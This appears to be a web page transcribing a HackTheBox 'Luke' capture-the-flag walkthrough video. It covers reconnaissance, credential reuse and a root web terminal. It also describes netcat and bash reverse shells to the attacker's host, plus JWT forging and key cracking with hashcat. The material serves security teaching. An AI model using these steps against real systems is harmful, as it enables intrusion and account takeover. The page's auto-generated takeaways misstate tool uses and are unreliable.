HackTheBox - Luke

IppSec · Intermediate ·🔧 Backend Engineering ·6y ago

Key Takeaways

The video demonstrates a hacking challenge on HackTheBox using various tools such as vsFTPd, SSH, Apache, node.js Express framework, and GoBuster to exploit vulnerabilities and gain access to the system. The challenge involves reconnaissance, web application exploitation, and JWT token manipulation.

Full Transcript

what's going on YouTube this is hip sack and we're doing Luke from hack the box and the thing I really liked about this box is that you didn't throw any exploits to do it and I know that sounds lame but a lot of pen tests you'll find that you just do recon find a password in something like github try that password login to something do more recon try another password somewhere else and after a few hops you finally get to what your goal is and that's what this box actually shows it's gonna be a little bit short so at the end of the video I'm planning on doing a little bit more like digging into JWT we'll go into creating tokens and then probably also brute-forcing them with hash code or something so with that being said let's just jump in as always we begin with a map so - SC for default scripts as V enumerate versions Oh a output all formats putting the end map director and call it Luke and then the IP address which is ten ten ten one thirty seven can take some time to run so I've already ran it look at the results there's a handful of ports open the first one is FTP on port 21 and it's running vs FTP D version 3.0 3 if you did some googling around on this version you see it's relatively recent so probably not worth your time looking into attacks against vs FTP D that being said it is configured to allow anonymous FTP logins and is hosting a web app directory so we should definitely return it to this the next thing we have is SSH on port 22 and maps telling us it's just open and believes this is SSH because the script executions failed I'm guessing that it just went slow and timed out so I'm going to start a SSH session to this box just to verify it is ssh listening on port 22 it should give us a login prompt to say something about host keys the next thing we have is HTTP on port 80 it's running Apache and its host banner is saying it's FreeBSD so if we have any local file inclusions or code executions we should know that it's FreeBSD because the commands and file locations are slightly different than on Linux and you can get some I think false negatives if you just do when expands on FreeBSD for example the web directory is generally not going to be invertible dub dub HTML so keep that in mind as we go on through this box the next thing we have is port 3000 is open it's also HTTP and it's telling us it's the node.js Express framework and then we have port 8000 open and that's telling us it's the a gent I HTTP control panel so the very first thing we want to do is look at this SSH connection we see it is prompting us to accept a key so this is most likely an SSH service the next thing we want to do is FTP so I'm just making the FTP directory to stay organized and then do FTP 10-10-10 137 username is anonymous because anonymous login is allowed password doesn't matter I just typed anonymous doing dir we can go into web app and then there's only one file it is called for shahira dot txt so I'm going to get this file and then we will look at its contents so get out of FTP cat the file and it's telling us that the it's a message to someone and saying hey the guy can give a little push by showing the sources of an actual website you created normally you should know where to look but hurry up because I will delete them soon due to security policies so the note really doesn't help all that much so let's go over to the actual website so ten ten ten one thirty seven there's gonna be the HTTP website now we got ten ten ten one thirty seven three thousand for the node J s and then we also have eight thousand for Gen ty so let's go open all this and I messed up on the eight thousand so we just get welcome to Luke Ltd a landing page template redesigned for bootstrap for and it's got about services contact and there's nothing too interesting so I'm just going to launch go Buster so we'll do go Buster - H actually don't have it installed let's just install this real quick now that girl buster is installed we can do - H to see the available modes and it says there's dir mode for directory file brute-forcing and DNS mode for subdomain and then also virtual host we want to do the directory approve forcing and then we can do - H to see all the flags first one is - you for your l HTTP 10-10-10 137 then - w for list users share word list then director gloucester directory list - 3 medium is why like using and before we finish the command let's just go back here and if we try like index dot PHP we see it is not found so if we do index dot HTML looks like this landing page is HTML I tried PHP because if we look at the output of end map we have PHP installed with Apache so I'm also going to search for PHP scripts with - X PHP to search all extensions and then while that go Buster runs we can also test out the port 3000 this is just JSON output so probably not PHP and also it said no js' framework and and map so let's just do the same go Buster command except we don't won't do the extension brute force so we can copy this and we probably should do an out file so - OH we'll call this go bust port 80 root 4 root directory and then we can call this go bust - port 3000 root and we also have to change the URL to be for 3,000 so now we got both of those go Buster's running we have login dot PHP on port 80 and we have login on port 3000 as well so I'm gonna go over to cherry tree and do interesting and we'll say login pages for a tea wall gang PHP actually I'm just trying think of a good way to organize this and then we just have slash login on port 3000 and doing things like this just helps you when you start running into roadblocks being like oh there's multiple login page places so I should try them all we do have member management CSS j/s and vendor look like they're probably just going to be source directories for random things like JavaScript or CSS files then we have config dot PHP so let's check out member and management so if we do slash member Oh wrong page slash member here we just get a open directory we do slash management we get a login prompt that says forbidden to visitors let's just try admin admin and we failed so go back to Cherrytree and we have slash management port 80 and this will be HTTP off so let's go back to the go bust the next thing is config dot PHP so let's try config dot PHP puts everything on one line because we don't have the HTML for breaks so I do I think that was control you yeah control you to view the source and then you get those line breaks so we do have credentials to my sequel username root password is this so let's copy this we can do probably a separate page for creds and then root that and we'll say this came from config dot PHP so the next thing we want is trying those creds everywhere so let's go to login dot PHP and director HTTP no okay I just saw that icon I guess Firefox puts that there when it's board 80 I thought that was like the self-signed cert icon try logging in with root and that incorrect information we can try admin as well root and admin a pretty synonymous much choice lash management root well again can't can't so if you go to 3,000 slash login we just get JSON saying please authenticate so there's no real data to here to authenticate against so we have to guess so let's open up a new panel we can just do curl for this and well first thing I want to do is HTTP colon slash slash root colon password I don't have my clipboard anymore creds copy/paste okay at ten ten ten one thirty seven slash login port 3000 slash login and we still get please off so it's not accepting HTTP authentication let's try - D for parameters and since we're doing it this way let's do a post request and normally it's like user is equal to root or username and password is equal to the password we get bad request since we don't have line breaks at the end I'm just putting semicolon echo to make it a bit easier to read we put something that doesn't matter here like please subscribe we also get bad requests we don't have anything let's see what we get bad requests so anything with a post we're just getting bad requests we try username equals root and password equals this which is another common variable for logins we get forbidden so now we know well this perform probably accepts both username and password in a post request it just doesn't accept this as the credentials so we can try admin admin and login with like default dreads doesn't work we can try admin and then the same password and we get success authentication successful and it gives us a big old token so then to clear the screen this looks like a JWT token we can verify that by just trying base64 decodes so we can see algorithm HS 256 that's H max sha 256 I believe type JWT I think it's JSON web token we can try the next thing we do echo - and then a 64 - D we get user name I 80 and expiration date I'm guessing well use names easy to guess RIT is probably one it was assigned and expiration is when it expires and then the very last thing of this JWT token is just a signature so that's the H Mac thing so if we do echo - n base 64 - D we get invalid input so this whole token or is it let's just do this again we want admin and password like that so essentially JWT is oh well that's going to be horrible it's broken up into three sections the very first section is this and this tells it information about the token so things like algorithm used for signing then the next portion the token this is going to be the actual data and then the final is the signature so that's the thing about a JWT token and we got one of the user admin so generally I would try different attacks like I try to create a token with no signing and seeing if the web server accept that and we'll probably do that the end of the video we're not gonna do that now because the tokens admin so why would we bother forging a token if we're already admin you just have figure out how to use the token so let's just do a curl outside of login and then we want to do dash H for header I think it's a capital H and then put the token so it's a authorization token and then bearer and then the token name and we get welcome admin now so this is just knowing how JWT tokens work and if you've done offshore you've probably seen my challenge that involves a JWT token but I digress let's just keep on going the other things on this if we go back to go Buster we have login and users so let's go to slash users and if we pipe this to JQ which I probably don't have installed right now so if we install JQ and then we'll pipe it over to JQ it'll give us a bit prettier output you could also go to like Bert probably and install a extension to add headers so I think if we went to like burps extender ad store add custom header and we install this we probably could do this so add custom header authorization bearer hood code value like that and then if we go to the page I think it'll do that so if we just go to slash and then now tell the browser to go through but we can turn intercept to off refresh the page authorization token not supplied maybe we have to add this to the scope yes auth token not supplied come on I told you to add it so maybe I don't know how this extension works I don't use burp extensions all that much I thought that would be easy let's see if there's any install instructions under extender let's see add custom header project option oh we have to add a special handling rule duh so we go to project options we can do session handling rules add and we can call this one add JWT token the rule action we want to invoke a burp extension add custom header and then in scope we want to change this to use a site scope we could do custom scope and specify HTTP 10 10 10 137 whoops I'll just do site scope but in this you can declare the exact scope so now I'm going to add the JDT token to everything on port 3000 if we refresh the page we should have been doing that we go to target scope we had already configured that so I'm just going to go back to project options we'll edit this change this go to be custom and we'll do HTTP 10 10 10 137 port 3000 okay parameter scope that should be fine Firefox is going through perp auth token not supplied why is this not working hood good value gbt token Oh we have to do with proxy so there we go refresh and we see welcome admin so it says it doesn't have that as a default because you can do some really bad things with this for example if we don't do a scope correctly we could send a JWT token to every single website that we have proxy through so that's probably why that's not a default option but happy that works now let's do it the easy way through the command line because I always prefer the command line we have JQ installed now so there we go so we can just do - ask for silence to get rid of this little header and slash users gives us a few things so we can try the standard like API way maybe users one to get information about one no users admin and we get name and password so just interacting with generally how REST API is work I don't know really how to explain it look up rest api's and you'll kind of figure that out so let's go to at this and we can do admin this and we can just say port 3000 and let's dump all the users so the next one will be Gary so de or Y this password port 3000 then URI and then whole do Dori as well so Yuri and these are all capitals use names jelly are not case-sensitive but always like being case sensitive one I don't know the answer and then Dory for 30,000 so now we have a handful of users so we can try all the logins again so if we go to slash login dot PHP let's try everything so admin paste dari URI and then Dori and we don't get anything but this is why you should always take a little good notes because we also have login on management and we never did a gen tie for 8,000 if you went all the way back here we did have username password so probably should have been testing logins there as well but we forgot to put this in her notes so we didn't do that always take good notes so let's do management I have a backslash there but it shouldn't really change anything go to creds do admin nothing dairy well again and it actually succeeds and it makes sense because if we looked at all this up top we have dairy as the web admin so the web admin can log in the root user which is admin maybe he could login to a gent I because he's the root user so we could also test that username admin password is this we can turn intercept off I'll probably go up a little bit try route and that and nothing I don't think yeah there we go invalid login so let's check out what's and slash management there are three files config JSON config dot PHP and login dot PHP this JSON has a lot of data config dot PHP we've already seen that's the same password and login dot PHP is this login so let's take a look at the config dot JSON and reading through all these variables this is a gent I config and we have a password here and is listening on port 8000 so let's try putting this password in won't try admin paste and the next one we'll try is root and Val login try root and we get in so first thing we do go to creds and we do root this and this is a gent I found in 80 config JSON there so we have an idea where it is and then going through all this there is one interesting thing that is called terminal so let's do new terminal click here we do Who am I we can see we are root we go to CD / root and then we got root X there so WC - see root txt and we see 33 characters which of course is md5 sum and then a line break so let's just get a reverse shell real quick so we don't have to use this annoying panel dev tcp/ip is by 10 10 14 3 and we always do port 9001 so let's do that and see LVN p 9001 send this command bad FD number that's Jesse bash is not found let's just make sure I did that bash reverse shell correctly and it's always possible that it's not working because well it is FreeBSD and not Linux phantasmo key that's the one I want see we'll just copy this go back to Luke paste fast - I I think I did that correctly ten ten fourteen three 9001 yep I had done that correctly so let's do which bash and v4 environment let's see what a good way to do a reverse shell do we have NC okay SH is our shell which SH and let's - go away then Sh so we're just been SH which and C and we have netcat so we can try this PHP where is netcat one if we have the - e and c - e / where is sh and SH ten ten fourteen three point nine thousand one Lib IPSec doesn't look like we have that - eopt n:y we default to this ugly command and it doesn't who I can paste in this terminal which is annoying so we'll do MK fi fo / tenth F that worked f then Shi 2 + 1 + C 10 10 14 3 9001 direct it back to the pipe and there we go we got a shell so Python - C input PT y PT y dot spawn then Sh which Python 3 which Python we don't have anything on this box which script script - Q dev null Sh let's try this sty raw - echo FG does not look like that worked export term is equal to X term oh well I can clear the screen I don't have tab autocomplete maybe I did that script command wrong let's see oh I have up let's see L okay dot config ok I do have tab ball to complete L just doesn't tab all to complete 2 LS so everything is right in the world so we got a proper shelter this box what else can we do let's look at JWT tokens so let's figure out where the signing key is so we go CD / there is no dap and you can also do like PS - aux i think yeah and if you go through all this you can see there is a node app running you can also do net stat get the pin and do all that type of stuff so there's a hundred ways you can find what processes are but let's just go in node app and config js' we get the secret is world is full of developers so let's go and do a little bit of pen testing on JWT knowledge make the extra so let's do pip3 install pi JWT to install the JWT library and python looks like it is now installed so we'll do this please sub dot Python and I also have a patreon if you want to support me there so since we have pi J DT we can just do import JWT and then the way to create a JWT token is JWT encode and then you give it the contents of what you want so we wanted username is equal to admin and then it had an IAT which I think is the assigned time is equal to what do 0 and see if this works and then it also had an expiration date but let's not put an expiration date and why would you want to do that maybe you want to do persistence so if you did this as long as they keep the same key you'll always have a token that works so the next variable is that and then the algorithm that was HS 256 and remember we saw that in the very first base 64 parameter so we got the JWT token there if we print JWT token python 3 please sub let's do JWT token is equal to JWT token dot decode utf-8 just to get it so it doesn't treat it as a byte string so there we go we got this token so let's see if the application is going to accept a infinite token so where is my Coral command curl it's in terminal 3 which is a net concession so let's just redo that HTTP 10-10-10 137 / - h4 header authorization error paste the token and we have the specified port 3000 and we get welcome admin so we could try let's always do actually let's just add it enter script to do this go request so please sub will do input requests and then we'll do headers is equal to authorization and then an F string error encoded JWA encoded jvt underscore token okay so we can print what the token looks like and then we also want to do R is equal to request get and then the URL and for once I didn't forget the port so how does is equal to headers like that print our text there we go so now we got the token and the username so let's try changing the username let's say what's greater token with hip sac and go and we still get welcome admin so it's just checking if the token is valid we went to this second piece we could see this base64 is completely different so echo dash n base 64 dash D we can see the token is like this it says invalid input because this is your rel encoded base64 I think which just doesn't do the padding there we go so it doesn't do the padding and it changes I think plus 2 . so I would changes the characters a little bit and gets rid of the equal padding at the end but there's that token an attack on JWT tokens is if the application just does like a JWT decode blindly and doesn't check for keys sometimes you can login by just removing the algorithm and forging your token that way so if we change before I do that let's just copy the line and comment today but if you change the key to none and the algorithm to none now we're not going to sign the token so if we don't sign the token what happens we get a token is not valid message so this time it didn't work sometimes you find JT JWT applications that will still accept that depending how their developer has it coded the final thing we can do if you want to look at the remember the first block is the header so if you do echo - n basics floor - D echo so you can see type is JW t algorithm is done the last thing we could do is probably brute force this so if we go back here and run this and just grab the token we can go over to hash cat and Kraken is just a machine I have I hate doing any type of cracking at a VM especially on the machine I'm recording from because it's a CPU intensive process and grateful wagging all that type of stuff so I always just remote elsewhere to do cracking but let's go into the hash cat folder we can do the hashes /jw t dot loop paste the token I'm going to do dot slash hash cat - - example hashes and then v i4 JWT we see it is there if we do - b4 before one we can see its mode 1 6 500 so if I do now search for one six five oh well we see it doesn't give us an example but it tells us it can crack JSON web tokens so if we do - hash cat - m16 500 and before we do that we have to create a password list so we'll do them please support on patreon and just create a bunch of passwords so we'll do tests like a bunch of things and then ones that the world is full of developers and then do hash cat m16 500 hashes JWT Luke and then the password file and then let this run and it should tell us which one is the valid password if you brute force the secret then you can just Forge all the JWT tokens you want and say your admin anyways um sq it did not crack it's probably my fault I probably put in there world is full of developers and made it like sentence like that yep so there we go let's run this again and you saw up top it said it had cracked it and you can also do I just recently found out about this - - show and hash gap will show you the password so there we go we have that long hash and then the secret so that was the box hope you guys enjoyed it take care and I'll see you all next week

Original Description

00:40 - Begin of Recon 02:45 - Checking FTP to get a note 03:38 - Going to each of the three websites 04:30 - Running Gobuster on port 80/3000 06:30 - Taking notes of all the login pages (forgot Ajenti) 07:55 - config.php found which has a password 10:15 - Discovering /login on port 3000 accepts username=&password= 11:25 - Successful login! JWT Token returned 14:00 - Using curl to add the JWT Token in the header to access other api endpoints 15:10 - Using BurpSuite to add headers 18:30 - Navigating the Rest API to dump the usernames and passwords 20:30 - Attempting logins on other services 21:30 - Derry can login to /management 22:50 - Ajenti Password! Lets try logging in 22:30 - Ajenti has a virtual terminal that is running as root! 26:20 - Extra Content - Getting a reverse shell 28:30 - Grabbing the JWT Secret, so we can forge our own tokens! 29:10 - Creating a python script to generate JWT Tokens 30:20 - This token has no expiration time, and is assigned at 0. Should never expire! 31:30 - Adding Requests to our script, so the script can make web requests 33:15 - Lets try removing all signing algorithms from the token and see if server accepts it 34:40 - Cracking the JWT Token Signing key with Hashcat
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 0 of 60

← Previous Next →
1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

This video teaches how to exploit vulnerabilities in web applications, manipulate JWT tokens, and use various tools such as GoBuster and hashcat to gain access to a system. The challenge involves reconnaissance, web application exploitation, and password cracking.

Key Takeaways
  1. Run vsFTPd to enumerate versions and check for anonymous login
  2. Use SSH to verify port 22 is open
  3. Use GoBuster to find available flags and list users
  4. Use Burp extension to manipulate HTTP requests
  5. Use hashcat to crack JWT tokens
💡 The key to solving this challenge is to use a combination of tools and techniques to exploit vulnerabilities and manipulate JWT tokens to gain access to the system.

Related Reads

📰
I built a VS Code Extension that mocks your OpenAPI spec locally — no Postman, no Docker, no Context switching
Learn to build a VS Code extension that mocks OpenAPI specs locally, streamlining API testing and development
Dev.to · Alex
📰
Taste: A Deep Dive
Learn how JavaScript's role is evolving in modern web development and why it matters for building future-proof applications
Dev.to · CITYJS CONFERENCE
📰
Why Most Laravel Projects Become Hard to Maintain (And How I Fixed It)
Learn how inconsistent coding structures in Laravel projects lead to maintenance issues and discover strategies to fix them, ensuring smoother project evolution
Medium · Programming
📰
Warp CEO Zach Lloyd on why software factories are the next phase of coding
Learn how software factories will revolutionize coding and why engineers should prepare for this shift to stay relevant
Latent Space

Chapters (22)

0:40 Begin of Recon
2:45 Checking FTP to get a note
3:38 Going to each of the three websites
4:30 Running Gobuster on port 80/3000
6:30 Taking notes of all the login pages (forgot Ajenti)
7:55 config.php found which has a password
10:15 Discovering /login on port 3000 accepts username=&password=
11:25 Successful login! JWT Token returned
14:00 Using curl to add the JWT Token in the header to access other api endpoints
15:10 Using BurpSuite to add headers
18:30 Navigating the Rest API to dump the usernames and passwords
20:30 Attempting logins on other services
21:30 Derry can login to /management
22:50 Ajenti Password! Lets try logging in
22:30 Ajenti has a virtual terminal that is running as root!
26:20 Extra Content - Getting a reverse shell
28:30 Grabbing the JWT Secret, so we can forge our own tokens!
29:10 Creating a python script to generate JWT Tokens
30:20 This token has no expiration time, and is assigned at 0. Should never expire!
31:30 Adding Requests to our script, so the script can make web requests
33:15 Lets try removing all signing algorithms from the token and see if server acce
34:40 Cracking the JWT Token Signing key with Hashcat
Up next
Indian Express Editorial Analysis by Chandan Sharma - 1 JULY 2026 | UPSC Current Affairs 2026
StudyIQ IAS
Watch →